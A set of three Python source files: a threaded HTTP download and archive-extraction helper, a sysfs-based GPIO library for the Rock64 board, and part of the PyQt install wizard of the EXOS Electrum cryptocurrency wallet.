headers = {'Range': 'bytes=%d-%d' % (start, end)}
r = requests.get(url, headers=headers, stream=True)
with open(filename, "r+b") as fp:
fp.seek(start)
var = fp.tell()
fp.write(r.content)
def _multi_thread_download(url, file_name, file_size, thread_count):
import threading
fp = open(file_name, "wb")
fp.truncate(file_size)
fp.close()
part = file_size // thread_count
for i in range(thread_count):
start = part * i
if i == thread_count - 1:
end = file_size
else:
end = start + part
t = threading.Thread(target=_downloader, kwargs={'start': start, 'end': end, 'url': url, 'filename': file_name})
t.setDaemon(True)
t.start()
main_thread = threading.current_thread()
for t in threading.enumerate():
if t is main_thread:
continue
t.join()
return file_name
def download_file(url, directory='./', local_fname=None, force_write=False, auto_unzip=False, compre_type=''):
"""Download the data from source url, unless it's already here.
Args:
        url: string, source url to download from if the file does not already exist.
        directory: string, path to the directory where the file is stored.
        local_fname: optional string, local file name; derived from the url when omitted.
        force_write: bool, re-download even if the file already exists.
        auto_unzip: bool, extract downloaded .tar.gz/.tgz/.zip archives into the directory.
Returns:
Path to resulting file.
"""
if not os.path.isdir(directory):
os.mkdir(directory)
if not local_fname:
k = url.rfind('/')
local_fname = url[k + 1:]
local_fname = os.path.join(directory, local_fname)
if os.path.exists(local_fname) and not force_write:
print ("File [{}] existed!".format(local_fname))
return local_fname
else:
print ("Downloading file [{}] from [{}]".format(local_fname, url))
try:
import wget
ret = wget.download(url, local_fname)
print ("")
except:
ret = _single_thread_download(url, local_fname)
if auto_unzip:
if ret.endswith(".tar.gz") or ret.endswith(".tgz"):
try:
import tarfile
tar = tarfile.open(ret)
for name in tar.getnames():
if not (os.path.realpath(os.path.join(directory, name))+ os.sep).startswith(os.path.realpath(directory) + os.sep):
raise ValueError('The decompression path does not match the current path. For more info: https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall')
tar.extractall(directory)
tar.close()
except ValueError:
raise
except:
print("Unzip file [{}] failed.".format(ret))
elif ret.endswith('.zip'):
try:
import zipfile
zip_ref = zipfile.ZipFile(ret, 'r')
for name in zip_ref.namelist():
if not (os.path.realpath(os.path.join(directory, name))+ os.sep).startswith(os.path.realpath(directory) + os.sep):
raise ValueError('The decompression path does not match the current path. For more info: https://docs.python.org/3/library/zipfile.html?highlight=zipfile#zipfile.ZipFile.extractall')
zip_ref.extractall(directory)
zip_ref.close()
except ValueError:
raise
except:
print("Unzip file [{}] failed.".format(ret))
return ret
"""
r = requests.head(url)
try:
file_size = int(r.headers['content-length'])
return _multi_thread_download(url, local_fname, file_size, 5)
except:
# not support multi-threads download
return _single_thread_download(url, local_fname)
return result
"""
|
GPIOBase.py
|
from abc import ABC, abstractmethod
from enum import Enum
from ROCK.Rock64Configs import BaseConfig
import sys
import os
import select
from threading import Thread
import time
ROCK64 = 'ROCK64'
BOARD = 'BOARD'
BCM = 'BCM'
IN = "in"
OUT = "out"
NONE = "none"
RISING = "rising"
FALLING = "falling"
BOTH = "both"
HIGH, LOW = BaseConfig.factory('ROCK64').get_highlow()
PUD_UP, PUD_DOWN = BaseConfig.factory('ROCK64').get_pullupdown()
class GPIOBase(ABC):
warning_enabled = False
mode = None
@abstractmethod
def setmode(self, mode):
pass
def getmode(self):
return self.mode
def setwarnings(self, state=True):
self.warning_enabled = state
pass
@abstractmethod
def setup(self, channel, direction, pull_up_down=PUD_DOWN, initial=LOW):
pass
@abstractmethod
def input(self, channel):
pass
@abstractmethod
def output(self, channel, value):
pass
@abstractmethod
def add_event_detect(self, channel, edge, callback, bouncetime):
pass
@abstractmethod
def remove_event_detect(self, channel):
pass
@staticmethod
def GPIOFactory(target):
if target == 'ROCK64':
return GPIORock64()
else:
raise ValueError("Not supported : {}".format(target))
class ThreadContext(object):
closethread = False
bouncetime = None
cb = None
threadhandle = None
def __init__(self, cb, bouncetime):
self.cb = cb
self.bouncetime = bouncetime
self.closethread = False
def notify_close(self):
self.closethread = True
if self.threadhandle is not None:
self.threadhandle.join()
class GPIORock64(GPIOBase):
gpio_offset = 0
event_cbs = {}
valid_channels = [27, 32, 33, 34, 35, 36, 37, 38, 64, 65, 67, 68, 69, 76, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 96, 97, 98, 100, 101, 102, 103, 104]
# http://files.pine64.org/doc/rock64/ROCK64_Pi-2%20_and_Pi_P5+_Bus.pdf
native_to_rock64_map = [None, None, "GPIO2_D1", None, "GPIO2_D0", None, None, "GPIO2_A0", None, "GPIO2_A1",
None, "GPIO2_A3", None, None, "GPIO3_A4", "GPIO3_A5", None, "GPIO3_A6", "GPIO3_A1", None,
"GPIO3_A2", "GPIO3_A7", "GPIO3_A0", "GPIO3_B0", None, "GPIO2_B4", "GPIO2_A4", "GPIO2_A5", None, None,
None, "GPIO1_A6", "GPIO1_A0", None, "GPIO1_A1", "GPIO1_A5", "GPIO1_A2", "GPIO1_A4", None, "GPIO1_A3"]
def __init__(self, gpio_offset=0):
super().__init__()
self.gpio_offset = gpio_offset
pass
def channel_to_pin(self, pin):
"""Converts the given channel to physical pin to be exported via gpio sysfs"""
if self.mode == BOARD:
return self.board_to_pin(pin)
elif self.mode == ROCK64:
return self.rock64_to_pin(pin)
raise ValueError("invalid pin and/or mode")
def board_to_pin(self, boardpin):
"""Converts the given channel (assuming board numbering is being used) to physical pin"""
if not isinstance(boardpin, int):
raise ValueError("invalid board pin, expected int")
if boardpin < 0 or boardpin >= len(self.native_to_rock64_map):
raise ValueError("invalid board pin given, should be within the rage of 0 to {}".format(len(self.native_to_rock64_map) - 1))
if self.native_to_rock64_map[boardpin] is None:
raise ValueError("invalid board pin, no possible mapping with GPIO pins")
return self.native_to_rock64_map[boardpin]
def rock64_to_pin(self, rock64pin):
"""Converts the given channel (assuming rock64 gpio numbering is being used) to physical pin"""
if len(rock64pin) != 8:
print("length of input {} = {}".format(rock64pin, len(rock64pin)))
raise ValueError("invalid rock64 pin format, should be of GPIO<N>_<C><N> format "
"where N is number and C is character")
if rock64pin[:4] != "GPIO":
raise ValueError("invalid rock64 pin format, should be of GPIO{1-4}_{A-D}{1-9} format")
bankNumber = int(rock64pin[4:5])
padNumber = rock64pin[-2]
pinNumber = int(rock64pin[-1])
if padNumber not in ["A", "B", "C", "D"]:
raise ValueError("invalid rock64 pin format, should be of GPIO{1-4}_{A-D}{1-9} format")
padNumber = ["A", "B", "C", "D"].index(padNumber)
channel = self.gpio_offset + (bankNumber * 32) + (8 * padNumber) + pinNumber
if channel not in self.valid_channels:
raise ValueError("invalid rock64 pin : {} translates to {}, but not valid for rock64".format(rock64pin, channel))
return channel
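    # Worked example (illustration only, not part of the original module): "GPIO2_A5" parses to
    # bank 2, pad "A" (index 0) and pin 5, so with the default gpio_offset of 0 the sysfs channel
    # is 0 + 2 * 32 + 8 * 0 + 5 = 69, which appears in valid_channels above.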
def setmode(self, mode):
"""Sets the mode for GPIO"""
if mode == BCM:
raise NotImplementedError("BCM PINMODE not implemented")
if mode != ROCK64 and mode != BOARD:
raise RuntimeError("mode not supported : {}".format(mode))
self.mode = mode
pass
def log_warning(self, msg):
"""Logs the message based on warning settings"""
if self.warning_enabled:
print("[WARN] {}".format(msg))
def export(self, channel):
base_syspath = "/sys/class/gpio"
base_export_path = "{}/export".format(base_syspath)
exported = "{}/gpio{}".format(base_syspath, channel)
if os.path.exists(exported): # already exported
self.log_warning("{} already exported as {}".format(channel, exported))
return True
with open(base_export_path, "w") as f:
f.write(str(channel))
if os.path.exists(exported): # export successful
return True
return False
def get_direction(self, channel):
base_syspath = "/sys/class/gpio"
base_gpio_direction = "{}/gpio{}/direction".format(base_syspath, channel)
if not os.path.exists(base_gpio_direction):
raise ValueError("pin is not exported")
with open(base_gpio_direction, "r") as f:
return f.readline().splitlines()[0] # unsafe, but this is sysfs and the output is fixed
def set_direction(self, channel, direction):
base_syspath = "/sys/class/gpio"
base_gpio_direction = "{}/gpio{}/direction".format(base_syspath, channel)
if not os.path.exists(base_gpio_direction):
raise ValueError("channel not exported")
with open(base_gpio_direction, "w") as f:
f.write(direction)
if direction in self.get_direction(channel):
return True
return False
def get_value(self, channel):
base_syspath = "/sys/class/gpio"
base_gpio_value = "{}/gpio{}/value".format(base_syspath, channel)
if not os.path.exists(base_gpio_value):
raise ValueError("pin is not exported")
with open(base_gpio_value) as f:
return int(f.readline())
def set_value(self, channel, value):
base_syspath = "/sys/class/gpio"
base_gpio_value = "{}/gpio{}/value".format(base_syspath, channel)
if self.get_direction(channel) != OUT:
return False
with open(base_gpio_value, "w") as f:
f.write(value)
return True
def get_edge(self, channel):
base_syspath = "/sys/class/gpio"
base_gpio_edge = "{}/gpio{}/edge".format(base_syspath, channel)
if not os.path.exists(base_gpio_edge):
raise ValueError("pin is not exported")
with open(base_gpio_edge) as f:
return f.readline().splitlines()[0]
def set_edge(self, channel, edge):
base_syspath = "/sys/class/gpio"
base_gpio_edge = "{}/gpio{}/edge".format(base_syspath, channel)
if not os.path.exists(base_gpio_edge):
raise ValueError("pin is not exported")
if edge not in [RISING, FALLING, BOTH, NONE]:
raise ValueError("wrong edge type given")
with open(base_gpio_edge, 'w') as f:
f.write(edge)
return True
def validate_channel(self, channel):
if isinstance(channel, list):
for c in channel:
self.validate_channel(c)
return channel
elif isinstance(channel, int):
if self.mode != BOARD:
raise ValueError("invalid channel given, mode is not BOARD, but channel is integer")
return [channel]
elif isinstance(channel, str):
if self.mode != ROCK64:
raise ValueError("invalid channel given, mode is not ROCK64, but channel is string")
return [channel]
raise ValueError("invalid channel given")
def setup(self, channel, direction, pull_up_down=PUD_DOWN, initial=LOW):
channel = self.validate_channel(channel)
for cur_chn in channel:
chn_no = self.channel_to_pin(cur_chn)
if not self.export(chn_no):
raise ValueError("unable to export {}".format(cur_chn))
if not self.set_direction(chn_no, direction):
raise ValueError("unable to set direction {}".format(cur_chn))
            # For now pull_up_down is ignored; the datasheet needs to be checked to see whether
            # such a mode exists. If you know, please feel free to add it.
if direction == OUT:
if not self.set_value(chn_no, initial):
raise ValueError("unable to set value {}".format(cur_chn))
pass
def fn_event_detect(self, channel, ctx):
if channel not in self.event_cbs.keys():
self.log_warning("unable to get context for the add_event_function, aborting")
epoll = select.epoll()
initial = self.get_value(channel)
initial_epoc = int(round(time.time() * 1000))
file = open("/sys/class/gpio/gpio{}/value".format(channel), 'r')
file.readline() # clear pending interrupts at the driver level
file.seek(0) # reset read cursor
epoll.register(file.fileno(), select.EPOLLPRI | select.EPOLLERR)
ctx.pollhandle = epoll
while not ctx.closethread:
events = epoll.poll(5) # poll every 5 seconds
for fileno, event in events:
if event & select.EPOLLPRI:
value = self.get_value(channel)
#print('OLD : {} NEW : {}'.format(initial, value))
cur_epoc = int(round(time.time() * 1000))
if cur_epoc - initial_epoc >= ctx.bouncetime and initial != value:
initial_epoc = cur_epoc
ctx.cb(channel, value)
file.readline() # clear pending interrupts at the driver level
file.seek(0) # reset read cursor
print("unregistering add_event_detect for {}".format(channel))
def add_event_detect(self, channel, edge, callback, bouncetime):
if callback is None:
self.log_warning("no callback given, ignoring add_event_detect() request")
return
if channel in self.event_cbs.keys():
self.log_warning("a previous event was defined for the key, replacing it")
ctx = self.event_cbs[channel]
ctx.notify_close()
del self.event_cbs[channel]
channel = self.validate_channel(channel)
if edge not in [RISING, FALLING, BOTH]:
raise ValueError("invalid edge value given for event detect. Only RISING, FALLING or BOTH allowed")
for cur_chn in channel:
chn_no = self.channel_to_pin(cur_chn)
self.set_edge(chn_no, edge)
if self.get_edge(chn_no) != edge:
raise ValueError("unable to set edge for event detect")
ctx = ThreadContext(cb=callback, bouncetime=bouncetime)
ctx.threadhandle = Thread(target=self.fn_event_detect, args=(chn_no, ctx))
self.event_cbs[chn_no] = ctx
ctx.threadhandle.start()
pass
def remove_event_detect(self, channel):
channel = self.validate_channel(channel)
for cur_chn in channel:
chn_no = self.channel_to_pin(cur_chn)
if chn_no not in self.event_cbs:
raise ValueError("invalid channel {} given, no event was registered".format(cur_chn))
ctx = self.event_cbs[chn_no]
ctx.notify_close()
del self.event_cbs[chn_no]
def input(self, channel):
self.validate_channel(channel)
phypin = self.channel_to_pin(channel)
return self.get_value(phypin)
def output(self, channel, value):
self.validate_channel(channel)
phypin = self.channel_to_pin(channel)
return self.set_value(phypin, value)
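# Usage sketch (illustration only, not part of the original module; the pin name, edge and
# bouncetime are assumptions). The calls mirror the RPi.GPIO-style API defined above:
#
#   gpio = GPIOBase.GPIOFactory('ROCK64')
#   gpio.setmode(ROCK64)
#   gpio.setup("GPIO2_A5", IN)
#   gpio.add_event_detect("GPIO2_A5", BOTH,
#                         callback=lambda channel, value: print(channel, value),
#                         bouncetime=200)
#   print(gpio.input("GPIO2_A5"))
#   gpio.remove_event_detect("GPIO2_A5")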
|
installwizard.py
|
# Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea)
from electrum_exos.wallet import Wallet, Abstract_Wallet
from electrum_exos.storage import WalletStorage
from electrum_exos.util import UserCancelled, InvalidPassword, WalletFileException
from electrum_exos.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum_exos.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton, char_width_in_lineedit)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from electrum_exos.plugin import run_hook
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in EXOS Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0] # type: InstallWizard
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
if type(out) is not tuple:
out = (out,)
run_next(*out)
except GoBack:
if wizard.can_go_back():
wizard.go_back()
return
else:
wizard.close()
raise
return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config, app, plugins):
QDialog.__init__(self, None)
BaseWizard.__init__(self, config, plugins)
self.setWindowTitle('EXOS Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
self.setMinimumSize(615, 435)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('exos-electrum.png')
self.show()
self.raise_()
        self.refresh_gui()  # Needed for Qt on macOS. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(17 * char_width_in_lineedit())
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('EXOS Electrum wallet'))
self.temp_storage = WalletStorage(path, manual_upgrades=True)
wallet_folder = os.path.dirname(self.temp_storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.temp_storage = wallet_from_memory.storage
else:
self.temp_storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except BaseException:
self.logger.exception('')
self.temp_storage = None
self.next_button.setEnabled(False)
user_needs_to_enter_password = False
if self.temp_storage:
if not self.temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if self.temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif self.temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
else:
msg = _('Cannot read file')
self.msg_label.setText(msg)
if user_needs_to_enter_password:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.temp_storage.path)
self.name_e.setText(n)
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled
if self.temp_storage.file_exists() and not self.temp_storage.is_encrypted():
break
if not self.temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if self.temp_storage.file_exists() and self.temp_storage.is_encrypted():
if self.temp_storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.temp_storage.decrypt(password)
break
except InvalidPassword as e:
self.show_message(title=_('Error'), msg=str(e))
continue
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=str(e))
raise UserCancelled()
elif self.temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=self.temp_storage)
except InvalidPassword as e:
self.show_message(title=_('Error'),
msg=_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=str(e))
raise UserCancelled()
if self.temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
return self.temp_storage.path, (self.temp_storage if self.temp_storage.file_exists() else None) #
def run_upgrades(self, storage):
path = storage.path
if storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = storage.get_action()
if action and storage.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = storage.db.data # FIXME
self.run(action)
for k, v in self.data.items():
storage.put(k, v)
storage.write()
return
if storage.requires_upgrade():
self.upgrade_storage(storage)
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
self.logger.error("on_error", exc_info=exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('With it, you can recover your tokens if you lose your wallet.'),
_('Without it, your tokens will be lost forever.'),
_('To make sure that you have properly saved your seed, please enter it here to validate.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title: str, message1: str, choices: List[Tuple[str, str, str]],
message2: str, test_text: Callable[[str], int],
run_next, default_choice_idx: int=0) -> Tuple[str, str]:
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
vbox.addLayout(clayout.layout())
vbox.addSpacing(50)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
